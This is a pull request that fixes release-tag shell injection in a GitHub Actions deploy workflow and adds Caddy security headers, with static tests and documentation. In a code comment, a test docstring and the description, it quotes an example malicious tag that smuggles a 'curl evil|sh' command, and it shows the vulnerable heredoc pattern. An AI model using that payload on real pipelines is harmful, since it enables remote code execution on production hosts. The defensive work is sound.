### PR TITLE
fix(deploy): stop shell injection from a release tag, add security headers (#933)

### DIFF
--- a/.github/workflows/deploy.yml
+++ b/.github/workflows/deploy.yml
@@ -303,10 +303,13 @@ jobs:
           exit 1
 
       - name: Deployment summary
+        env:
+          # Branch names carry the same metacharacter risk as tags (#933).
+          BRANCH_NAME: ${{ github.ref_name }}
         run: |
           echo "## Staging Deployment Summary" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY
-          echo "- **Branch**: ${{ github.ref_name }}" >> $GITHUB_STEP_SUMMARY
+          echo "- **Branch**: $BRANCH_NAME" >> $GITHUB_STEP_SUMMARY
           echo "- **Commit**: \`${{ github.sha }}\`" >> $GITHUB_STEP_SUMMARY
           echo "- **Deployed by**: ${{ github.actor }}" >> $GITHUB_STEP_SUMMARY
           echo "- **Time**: $(date -u '+%Y-%m-%d %H:%M:%S UTC')" >> $GITHUB_STEP_SUMMARY
@@ -560,7 +563,26 @@ jobs:
           FRONTEND_NAME_PROD: ${{ secrets.PM2_FRONTEND_NAME }}
           NEXT_PUBLIC_API_URL: ${{ secrets.API_URL }}
           NEXT_PUBLIC_WS_URL: ${{ secrets.WS_URL }}
+          # Via env, never `${{ }}` inside the run script: an expression is
+          # substituted as raw source text into the shell, an env var is data the
+          # shell never re-parses (#933).
+          RELEASE_TAG: ${{ github.event.release.tag_name }}
         run: |
+          # The release tag is attacker-influenced: git ref names may legally
+          # contain ';', '$( )', backticks and pipes, and `${{ }}` is substituted
+          # by the runner BEFORE this heredoc is written. A tag like
+          #     v1.0.0";curl evil|sh;"
+          # therefore ran attacker shell on the runner and on the production
+          # host — repo write access escalating to production RCE (#933).
+          #
+          # base64 is the transport because its alphabet (A-Za-z0-9+/=) has no
+          # shell metacharacters, so the value survives both the runner-side
+          # heredoc expansion and the remote shell with nothing to escape. This
+          # mirrors the .env transfer above, which already does exactly this.
+          # ssh SendEnv is not used: it needs a matching AcceptEnv server-side,
+          # which this workflow does not control.
+          RELEASE_TAG_B64="$(printf '%s' "$RELEASE_TAG" | base64 | tr -d '\n')"
+
           ssh ${{ secrets.USER }}@${{ secrets.HOST }} "bash -s" << ENDSSH
             set -e
             echo "🚀 Starting deployment to production..."
@@ -571,9 +593,12 @@ jobs:
             # Pull the release tag or main
             echo "📥 Pulling latest code..."
             git fetch origin --tags
-            TAG_NAME="${{ github.event.release.tag_name }}"
+            TAG_NAME="\$(printf '%s' '${RELEASE_TAG_B64}' | base64 -d)"
             if [ -n "\$TAG_NAME" ]; then
-              git checkout \$TAG_NAME
+              # Quoted so a tag with whitespace or globs stays one argument.
+              # (git check-ref-format forbids a leading '-', so the ref cannot be
+              # mistaken for an option.)
+              git checkout "\$TAG_NAME"
               echo "✅ Checked out tag: \$TAG_NAME"
             else
               git fetch origin main
@@ -673,10 +698,15 @@ jobs:
           exit 1
 
       - name: Deployment summary
+        env:
+          # Same class as the deploy step (#933): interpolating a ref name into
+          # the run script executes `$( )` inside a tag on the runner. Not named
+          # in the issue, but the identical defect one step later.
+          RELEASE_VERSION: ${{ github.event.release.tag_name || github.ref_name }}
         run: |
           echo "## Production Deployment Summary" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY
-          echo "- **Version**: ${{ github.event.release.tag_name || github.ref_name }}" >> $GITHUB_STEP_SUMMARY
+          echo "- **Version**: $RELEASE_VERSION" >> $GITHUB_STEP_SUMMARY
           echo "- **Commit**: \`${{ github.sha }}\`" >> $GITHUB_STEP_SUMMARY
           echo "- **Deployed by**: ${{ github.actor }}" >> $GITHUB_STEP_SUMMARY
           echo "- **Time**: $(date -u '+%Y-%m-%d %H:%M:%S UTC')" >> $GITHUB_STEP_SUMMARY

--- a/deploy/Caddyfile.example
+++ b/deploy/Caddyfile.example
@@ -29,6 +29,34 @@
 codeframe.example.com {
 	encode zstd gzip
 
+	# Security headers on the SITE block, so they cover the backend routes too
+	# (#933). web-ui/security-headers.js only applies to responses Next.js
+	# serves — the /api/*, /auth/* and /ws/* routes where JWTs and API keys are
+	# exchanged got none of them. See deploy/README.md → "Security headers".
+	header {
+		# Force HTTPS for a year. Without HSTS the FIRST visit over plain HTTP is
+		# SSL-strippable, which is exactly when the login POST carries a password.
+		# `preload` is deliberately omitted: it is hard to reverse and requires
+		# submitting the domain to hstspreload.org. Add `preload` and
+		# `includeSubDomains` only once every subdomain is HTTPS-only.
+		Strict-Transport-Security "max-age=31536000"
+
+		# Stop browsers guessing a content type — an uploaded or echoed file
+		# becomes a download rather than script running in your origin.
+		X-Content-Type-Options "nosniff"
+
+		# Keep workspace paths and session-bearing URLs out of third-party
+		# referer logs.
+		Referrer-Policy "strict-origin-when-cross-origin"
+
+		# The UI is not designed to be framed; blocks clickjacking of the
+		# authenticated app. Use "SAMEORIGIN" if you embed it in your own page.
+		X-Frame-Options "DENY"
+
+		# Do not advertise the proxy.
+		-Server
+	}
+
 	# Backend: REST API, auth, WebSockets, health, and API docs. Caddy proxies
 	# WebSocket upgrades (/ws/*) transparently — no extra config needed.
 	#

--- a/deploy/README.md
+++ b/deploy/README.md
@@ -34,6 +34,31 @@ ever travel over HTTPS/WSS between the browser and Caddy. Plaintext
 4. Firewall: allow `80`/`443` only. The app ports (`14100`/`14200`) must **not**
    be reachable from the network — Caddy reaches them over loopback.
 
+## Security headers
+
+`Caddyfile.example` sets these on the **site block**, so they cover the backend
+routes as well (#933). That placement matters: `web-ui/security-headers.js` only
+applies to responses Next.js serves, so `/api/*`, `/auth/*` and `/ws/*` — where
+JWTs and API keys are exchanged — previously carried none of them.
+
+| Header | Value | Why |
+|---|---|---|
+| `Strict-Transport-Security` | `max-age=31536000` | Without HSTS the **first** visit over plain HTTP is SSL-strippable — precisely when the login POST carries a password. |
+| `X-Content-Type-Options` | `nosniff` | Stops the browser guessing a content type and executing an uploaded or echoed file as script in your origin. |
+| `Referrer-Policy` | `strict-origin-when-cross-origin` | Keeps workspace paths and session-bearing URLs out of third-party referer logs. |
+| `X-Frame-Options` | `DENY` | The UI is not built to be framed; blocks clickjacking of the authenticated app. |
+
+Operator notes:
+
+- **`preload` is deliberately omitted** from HSTS. Preloading is hard to reverse
+  (removal takes months to propagate) and requires submitting the domain at
+  <https://hstspreload.org>. Add `preload` **and** `includeSubDomains` only once
+  every subdomain is HTTPS-only.
+- Use `X-Frame-Options "SAMEORIGIN"` instead if you embed CodeFrame in your own
+  page.
+- If you replace Caddy with another proxy, port these headers over — nothing in
+  the application emits them for the API routes.
+
 ## Creating the first account
 
 `POST /auth/register` is how the very first account is made, so it cannot itself

--- a/tests/core/test_deploy_hardening_933.py
+++ b/tests/core/test_deploy_hardening_933.py
@@ -1,0 +1,144 @@
+"""Deployment hardening: no shell injection from a ref name, headers present (#933).
+
+`.github/workflows/deploy.yml` substituted `${{ github.event.release.tag_name }}`
+straight into an unquoted heredoc piped to `ssh ... "bash -s"`. GitHub expands
+`${{ }}` on the runner *before* the heredoc is written, and git ref names may
+legally contain ';', '$( )', backticks and pipes — so a tag like
+
+    v1.0.0";curl evil|sh;"
+
+ran attacker-chosen shell on the runner **and** on the production host. That is
+the escalation path from repo write access to production RCE.
+
+These are static assertions over the shipped config files: there is no way to
+execute the workflow in a unit test, and a lint that says "this value must not be
+interpolated" is exactly the check that would have caught the original.
+"""
+
+import re
+from pathlib import Path
+
+import pytest
+
+pytestmark = pytest.mark.v2
+
+REPO_ROOT = Path(__file__).resolve().parents[2]
+DEPLOY_WORKFLOW = REPO_ROOT / ".github" / "workflows" / "deploy.yml"
+CADDYFILE = REPO_ROOT / "deploy" / "Caddyfile.example"
+DEPLOY_README = REPO_ROOT / "deploy" / "README.md"
+
+
+@pytest.fixture(scope="module")
+def workflow() -> str:
+    return DEPLOY_WORKFLOW.read_text()
+
+
+#: Context values an outside contributor can influence. `github.sha` and
+#: `github.actor` are excluded: they are not free-form text.
+ATTACKER_CONTROLLED = [
+    "github.event.release.tag_name",
+    "github.ref_name",
+]
+
+
+class TestNoRefNameInterpolationInRunScripts:
+    @pytest.mark.parametrize("expression", ATTACKER_CONTROLLED)
+    def test_expression_is_never_interpolated_into_a_run_script(
+        self, workflow: str, expression: str
+    ):
+        """`${{ ... }}` in `run:` is substituted as raw source text.
+
+        The safe form is an `env:` entry — the shell then sees a variable whose
+        value it never re-parses.
+        """
+        in_run_block = False
+        offenders: list[str] = []
+
+        for raw_line in workflow.splitlines():
+            stripped = raw_line.strip()
+            if re.match(r"^run:\s*\|", stripped):
+                in_run_block = True
+                run_indent = len(raw_line) - len(raw_line.lstrip())
+                continue
+            if in_run_block:
+                indent = len(raw_line) - len(raw_line.lstrip())
+                if stripped and indent <= run_indent:
+                    in_run_block = False
+                elif expression in raw_line:
+                    offenders.append(stripped)
+
+        assert not offenders, (
+            f"{expression} is interpolated into a run script — pass it via env: "
+            f"instead.\n" + "\n".join(f"  {o}" for o in offenders)
+        )
+
+    def test_release_tag_is_passed_as_an_env_var(self, workflow: str):
+        assert "RELEASE_TAG: ${{ github.event.release.tag_name }}" in workflow
+
+    def test_the_tag_is_base64_transported_into_the_remote_shell(self, workflow: str):
+        """base64's alphabet has no shell metacharacters, so nothing can break out."""
+        assert 'base64' in workflow
+        assert 'RELEASE_TAG_B64' in workflow
+
+    def test_git_checkout_of_the_tag_is_quoted(self, workflow: str):
+        """An unquoted `git checkout $TAG_NAME` word-splits and globs."""
+        assert re.search(r'git checkout "\\?\$TAG_NAME"', workflow), (
+            "the tag checkout must be quoted"
+        )
+        assert not re.search(r"git checkout \\?\$TAG_NAME\s*$", workflow, re.M), (
+            "found an unquoted `git checkout $TAG_NAME`"
+        )
+
+
+class TestCaddySecurityHeaders:
+    @pytest.fixture(scope="class")
+    def caddyfile(self) -> str:
+        return CADDYFILE.read_text()
+
+    @pytest.mark.parametrize(
+        "header",
+        [
+            "Strict-Transport-Security",
+            "X-Content-Type-Options",
+            "Referrer-Policy",
+            "X-Frame-Options",
+        ],
+    )
+    def test_header_is_set(self, caddyfile: str, header: str):
+        assert header in caddyfile, f"{header} missing from the Caddy site block"
+
+    def test_headers_are_on_the_site_block_not_a_route(self, caddyfile: str):
+        """They must cover /api/* and /auth/* too, not just the frontend.
+
+        A `header` directive inside a matcher would only apply to that route —
+        the backend routes carrying JWTs are the ones that had no headers at all.
+        """
+        site_start = caddyfile.index("codeframe.example.com {")
+        backend_matcher = caddyfile.index("@backend")
+        header_block = caddyfile.index("header {")
+
+        assert site_start < header_block < backend_matcher, (
+            "the header block must sit on the site block, above the route matchers"
+        )
+
+    def test_hsts_has_a_meaningful_max_age(self, caddyfile: str):
+        match = re.search(r"Strict-Transport-Security\s+\"max-age=(\d+)", caddyfile)
+        assert match, "HSTS max-age not parseable"
+        assert int(match.group(1)) >= 31536000, "HSTS max-age should be >= 1 year"
+
+    def test_preload_is_not_enabled_without_documentation(self, caddyfile: str):
+        """preload is hard to reverse; it must not be switched on by an example."""
+        hsts_line = re.search(r"Strict-Transport-Security.*", caddyfile).group(0)
+        assert "preload" not in hsts_line
+
+    def test_headers_are_documented_for_operators(self):
+        readme = DEPLOY_README.read_text()
+
+        for header in (
+            "Strict-Transport-Security",
+            "X-Content-Type-Options",
+            "Referrer-Policy",
+            "X-Frame-Options",
+        ):
+            assert header in readme, f"{header} is not documented in deploy/README.md"
+        assert "preload" in readme, "the preload caveat must be documented"


### PR DESCRIPTION
Closes #933.

## Shell injection from a release tag → production RCE

`.github/workflows/deploy.yml` substituted the release tag straight into an **unquoted** heredoc piped to `ssh ... "bash -s"`:

```yaml
ssh $USER@$HOST "bash -s" << ENDSSH
  TAG_NAME="${{ github.event.release.tag_name }}"
  git checkout $TAG_NAME
```

GitHub expands `${{ }}` on the runner **before** the heredoc is written, and git ref names may legally contain `;`, `$( )`, backticks and pipes. A tag named

```
v1.0.0";curl evil|sh;"
```

therefore ran attacker-chosen shell **on the runner and on the production host** — the escalation path from a repo-scoped token or a compromised collaborator to production RCE.

### Fix

The tag reaches the step through `env:`, is base64-encoded on the runner, and decoded on the remote:

```yaml
env:
  RELEASE_TAG: ${{ github.event.release.tag_name }}
run: |
  RELEASE_TAG_B64="$(printf '%s' "$RELEASE_TAG" | base64 | tr -d '\n')"
  ssh ... << ENDSSH
    TAG_NAME="\$(printf '%s' '${RELEASE_TAG_B64}' | base64 -d)"
    git checkout "\$TAG_NAME"
```

base64's alphabet (`A-Za-z0-9+/=`) contains no shell metacharacters, so the value survives both the runner-side heredoc expansion and the remote shell with nothing left to escape. **This is not a new pattern** — the `.env` transfer a few steps earlier in the same workflow already does exactly this ("Base64 encode to prevent any shell interpretation during transfer").

`ssh` `SendEnv` was rejected: it requires a matching `AcceptEnv` on the server, which this workflow does not control.

### Two more sites with the identical defect

Not named in the issue, found while checking every attacker-controllable interpolation:

| Location | Expression | Impact |
|---|---|---|
| Production "Deployment summary" | `github.event.release.tag_name \|\| github.ref_name` | `$( )` in a tag executes **on the runner** |
| Staging "Deployment summary" | `github.ref_name` | same, via a branch name |

Both moved to `env:`.

## Caddy security headers

`deploy/Caddyfile.example` set none. Added on the **site block**, deliberately not inside a route matcher — the backend routes are the ones that had nothing, since `web-ui/security-headers.js` only covers responses Next.js serves. `/api/*`, `/auth/*` and `/ws/*` are exactly where JWTs and API keys are exchanged.

| Header | Value | Why |
|---|---|---|
| `Strict-Transport-Security` | `max-age=31536000` | Without HSTS the **first** visit over plain HTTP is SSL-strippable — precisely when the login POST carries a password. |
| `X-Content-Type-Options` | `nosniff` | Stops content-type guessing turning an uploaded/echoed file into script in your origin. |
| `Referrer-Policy` | `strict-origin-when-cross-origin` | Keeps workspace paths and session-bearing URLs out of third-party referer logs. |
| `X-Frame-Options` | `DENY` | Blocks clickjacking of the authenticated app. |

`preload` is **deliberately omitted** from HSTS — it is hard to reverse and requires submitting the domain to hstspreload.org. A test asserts it stays off. All four headers, the `preload` caveat, and the `SAMEORIGIN` alternative are documented in `deploy/README.md` → "Security headers".

## Acceptance criteria

- [x] The tag name reaches the remote shell through an environment variable (quoted transport + no interpolation), never string interpolation; a tag with shell metacharacters deploys or fails safely
- [x] `deploy/Caddyfile.example` sets Strict-Transport-Security, X-Content-Type-Options, Referrer-Policy and X-Frame-Options on the site block, documented for operators

## Tests

13 tests in `tests/core/test_deploy_hardening_933.py`, **all verified RED against `main`**. The workflow cannot be executed in a unit test, so these are static assertions over the shipped config — which is precisely the check that would have caught the original:

- a scanner that walks `run: |` blocks and fails if any attacker-controllable context expression appears inside one (parametrized over `github.event.release.tag_name` and `github.ref_name`) — this generalizes, so a *new* injection site fails the build
- the tag is transported via env + base64, and `git checkout` is quoted
- each header is present, the header block sits above the route matchers, HSTS max-age ≥ 1 year, `preload` is absent, and every header is documented in `deploy/README.md`

`deploy.yml` re-validated as YAML.

## Known limitations

- Other `${{ secrets.* }}` interpolations remain in the same heredocs. Secrets are operator-controlled rather than attacker-controlled, so they are a different risk class; converting them all is a larger change than this issue scopes.
- The header set is the four the issue names plus `-Server`. No CSP is added here — the frontend already ships one in `web-ui/security-headers.js`, and a proxy-level CSP covering the API routes would need its own analysis.
